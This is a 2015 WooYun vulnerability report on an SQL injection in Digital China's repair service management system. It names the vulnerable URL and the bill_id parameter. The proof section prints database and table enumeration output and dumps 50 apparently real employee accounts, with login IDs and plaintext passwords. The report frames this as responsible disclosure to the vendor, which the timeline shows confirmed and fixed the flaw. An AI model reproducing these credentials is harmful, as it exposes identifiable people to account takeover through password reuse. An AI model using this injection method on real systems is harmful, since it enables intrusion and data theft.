当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140093

漏洞标题:神州数码某重要系统SQL注入(百万账户泄露/密码明文存储)

相关厂商:digitalchina.com

漏洞作者: 深度安全实验室

提交时间:2015-09-10 09:45

修复时间:2015-09-11 10:52

公开时间:2015-09-11 10:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-10: 细节已通知厂商并且等待厂商处理中
2015-09-10: 厂商已经确认,细节仅向厂商公开
2015-09-11: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

rt

详细说明:

神州数码维修服务管理系统 如下链接存在sql注入,其中,bill_id参数有问题

http://servexpress.digitalchina.com/sms/DELL/wurnew/snap_sdar.asp?bill_id=D506184191

1.png

漏洞证明:

发现11个库

2.png


以U_DELL库为例,发现千万规模的表

back-end DBMS: Oracle
Database: U_DELL
+-----------------------+---------+
| Table | Entries |
+-----------------------+---------+
| OPT_LIST | 22807944 |
| SER_RC_END | 9989419 |
| EDI_DETAIL | 5221963 |
| EDI_INVENTORY_TEMP_3S | 2814074 |
| REQ_LIST | 1770091 |
| SER_BACK_CLASS | 1703605 |
| REQ_INF | 1614940 |
| BILL_INDEX | 1606424 |
| T142_20_C | 1592256 |
| SER_INDEX | 1513885 |
| BILL_LIST_BAK | 1459097 |
| SER_INF_BAK | 1404593 |
| PART_LIST_BAK | 1293696 |
| RMA_PICK_UP_BAK | 1138502 |


以ERS库为例,发现百万规模的表

Database: ERS
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| LOGIN_LIST | 4141728 |
| CUST | 2718576 |
| PERSON_INF | 2392669 |
| CCS_DELL_RESULT | 1154633 |
| MAIL | 1056855 |
| CCS_CASE | 854095 |
| ORGNIZATION_PROFILE | 316973 |
| CCS_AD_BILL | 260222 |
| CCS_AD_OPT_LOG | 116561 |
| DAY_LIST | 10000 |


泄露的账户信息,包括:用户名、密码等,密码竟然是明文存储,我也是醉了

Database: ERS
Table: DIC_USERS
[50 entries]
+---------+-------------+--------------+-----+-------------+----------------------+
| USER_ID | LOGIN_ID | PASSWORD | M1 | M2 | LAST_UPDATE_PWD_DATE |
+---------+-------------+--------------+-----+-------------+----------------------+
| 10140 | dc-fucx1 | zzzzzz1 | nec | dc-fucx1 | 2015-04-01 15:56:26 |
| 10141 | xa-songzy | song123 | nec | xa-songzy | 2009-10-09 09:38:18 |
| 10142 | bj-zhaoyan | 885669 | nec | bj-zhaoyan | 2001-01-01 00:00:00 |
| 10144 | dc-lyq | 1qa23z | nec | dc-lyq | 2012-03-12 11:48:43 |
| 10145 | sh-kl | 64661559kl | nec | sh-kl | 2011-09-07 18:27:12 |
| 10146 | bj2-yzy | yzy | nec | bj2-yzy | 2001-01-01 00:00:00 |
| 10147 | wh-lvyp | lyp811214 | nec | wh-lvyp | 2008-12-15 10:10:58 |
| 10148 | sy-huanghai | huanghai | nec | sy-huanghai | 2001-01-01 00:00:00 |
| 10149 | bj-libr | libr | nec | bj-libr | 2001-01-01 00:00:00 |
| 10150 | bj-liujd | 12345 | nec | bj-liujd | 2001-01-01 00:00:00 |
| 10151 | xa-liwq | 123456l | nec | xa-liwq | 2015-04-01 14:24:12 |
| 10152 | dc-syl | enter | nec | dc-syl | 2001-01-01 00:00:00 |
| 10153 | bj-lj | lijiae1 | nec | bj-lj | 2009-10-09 10:58:50 |
| 10154 | bj-fuqh | fuqh | nec | bj-fuqh | 2001-01-01 00:00:00 |
| 10155 | dc-zb | zhaobin7879 | nec | dc-zb | 2014-06-16 17:59:19 |
| 10156 | nj-zt | nj | nec | nj-zt | 2001-01-01 00:00:00 |
| 10157 | bj-fanyj | blfiqpgf | nec | bj-fanyj | 2001-01-01 00:00:00 |
| 10158 | bj-jl | akuma820809 | nec | bj-jl | 2001-01-01 00:00:00 |
| 10159 | bj2-jl | akuma820809 | nec | bj2-jl | 2001-01-01 00:00:00 |
| 10160 | bj2-mn | maning122802 | nec | bj2-mn | 2013-02-21 14:29:31 |
| 10161 | bj2-fyj | 198000 | nec | bj2-fyj | 2001-01-01 00:00:00 |
| 10162 | bj-xzm | xzm | nec | bj-xzm | 2001-01-01 00:00:00 |
| 10163 | sh-zxl | zxl321 | nec | sh-zxl | 2015-04-03 14:39:05 |
| 10164 | bj-zhy | zhy123 | nec | bj-zhy | 2013-07-08 09:16:43 |
| 10165 | dc-cc | dccc800 | nec | dc-cc | 2015-06-26 09:25:13 |
| 10166 | bj-lbw | 5211314 | nec | bj-lbw | 2001-01-01 00:00:00 |
| 10167 | sh-lx | anad0728 | nec | sh-lx | 2015-05-08 18:08:50 |
| 10168 | dc-sqj | 13301353150 | nec | dc-sqj | 2001-01-01 00:00:00 |
| 10170 | dc-wwj | 0606wwj | nec | dc-wwj | 2011-09-14 09:42:55 |
| 10171 | dc-wg | newpass123x | nec | dc-wg | 2013-09-23 15:13:00 |
| 10173 | bj-hxq | hxq000 | nec | bj-hxq | 2015-01-23 09:20:29 |
| 10175 | sh-zsy | tos901 | nec | sh-zsy | 2014-05-13 16:15:57 |
| 10176 | wh-lly | asd321 | nec | wh-lly | 2014-03-28 12:35:06 |
| 10177 | sz-tzy | NONE | nec | sz-tzy | 2001-01-01 00:00:00 |
| 10178 | bj-ty | ty19710401 | nec | bj-ty | 2008-12-31 15:16:16 |
| 10179 | bj-ln | 1234 | nec | bj-ln | 2001-01-01 00:00:00 |
| 10180 | bj-mn | 19810802 | nec | bj-mn | 2001-01-01 00:00:00 |
| 10181 | bj-wl | 741852pp | nec | bj-wl | 2013-07-04 18:44:50 |
| 10182 | bj-jxl | ooo | nec | bj-jxl | 2001-01-01 00:00:00 |
| 10183 | dc-nw | 781029 | nec | dc-nw | 2001-01-01 00:00:00 |
| 10184 | jn-zl | 123asd | nec | jn-zl | 2009-10-16 15:38:12 |
| 10185 | nj-zxy | zxy | nec | nj-zxy | 2012-07-05 14:19:53 |
| 10186 | dc-zhuhj | aaa111 | nec | dc-zhuhj | 2014-06-06 11:21:41 |
| 10187 | dc-niewei | 456 | nec | dc-niewei | 2001-01-01 00:00:00 |
| 10188 | nec-jzq | nec12345 | nec | nec-jzq | 2009-01-05 13:57:29 |
| 10189 | 10189 | lizhb2009 | nec | cd-zhouzh | 2010-09-21 18:17:24 |
| 10190 | nec-zq | nec111 | nec | nec-zq | 2009-03-12 17:55:26 |
| 10191 | nec-zgyj | 11111 | nec | nec-zgyj | 2001-01-01 00:00:00 |
| 10192 | nec-hy | 12345678 | nec | nec-hy | 2001-01-01 00:00:00 |
| 10193 | dc-yangqian | 42yangqian | nec | dc-yangqian | 2014-07-15 11:35:09 |
+---------+-------------+--------------+-----+-------------+----------------------+


修复方案:

版权声明:转载请注明来源 深度安全实验室@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-09-10 11:05

厂商回复:

尽快处理!

最新状态:

2015-09-11:已修复